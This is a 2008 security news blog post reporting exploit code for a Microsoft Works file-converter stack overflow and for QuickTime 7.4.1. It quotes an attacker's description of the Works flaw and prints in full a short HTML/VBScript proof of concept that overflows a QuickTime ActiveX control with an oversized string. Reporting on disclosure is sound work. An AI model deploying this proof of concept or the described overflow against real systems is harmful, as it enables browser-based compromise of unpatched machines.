February 14th, 2008

Exploit code surfaces for Microsoft Works, QuickTime

Posted by Larry Dignan @ 9:25 am

Categories: Apple, Exploit code, Microsoft, Patch Watch, Responsible disclosure, Vulnerability research

Tags: Apple QuickTime, Microsoft Corp., Microsoft Works, Office Suites, Digital Music, Digital Media, Software, Personal Technology, Consumer Electronics, Larry Dignan

Exploit code for Microsoft Works–which was just patched on Tuesday–and QuickTime is making the rounds.

First up, the Microsoft Works exploit. A hacker dubbed “chujwamwdupe,” who also makes Teletubbies references for giggles, posted the following:

A vulnerability exists in WPS to RTF convert filter that is part of Microsoft Office 2003. It could be exploited by remote attacker to take complete control of an affected system. This issue is due to stack overflow error in function that read secions from WPS file. When we change size of for example TEXT section to number langer than 0×10, stack overflow occurs - very easy to exploit.

The code is also available on Milw0rm. Microsoft had patched this issue with bulletin MS08-011 on Tuesday.

Meanwhile, Laurent Gaffié posted a proof of concept for multiple stack overflow vulnerabilities for QuickTime 7.4.1.

That code, also posted on Milw0rm, is as follows:

Proof of concept example [works with the others functions supplyed in section 2) ] :
<html>
<object classid=’clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B’ id=’foo’ ></object>
<input type=”button” value=”Hit me” language=”VBScript” OnClick=”test()”>
<script language=”VBScript”>
sub test()
bar = String(515305, “A”)
foo.SetBgColor bar
End Sub
</script>
</html>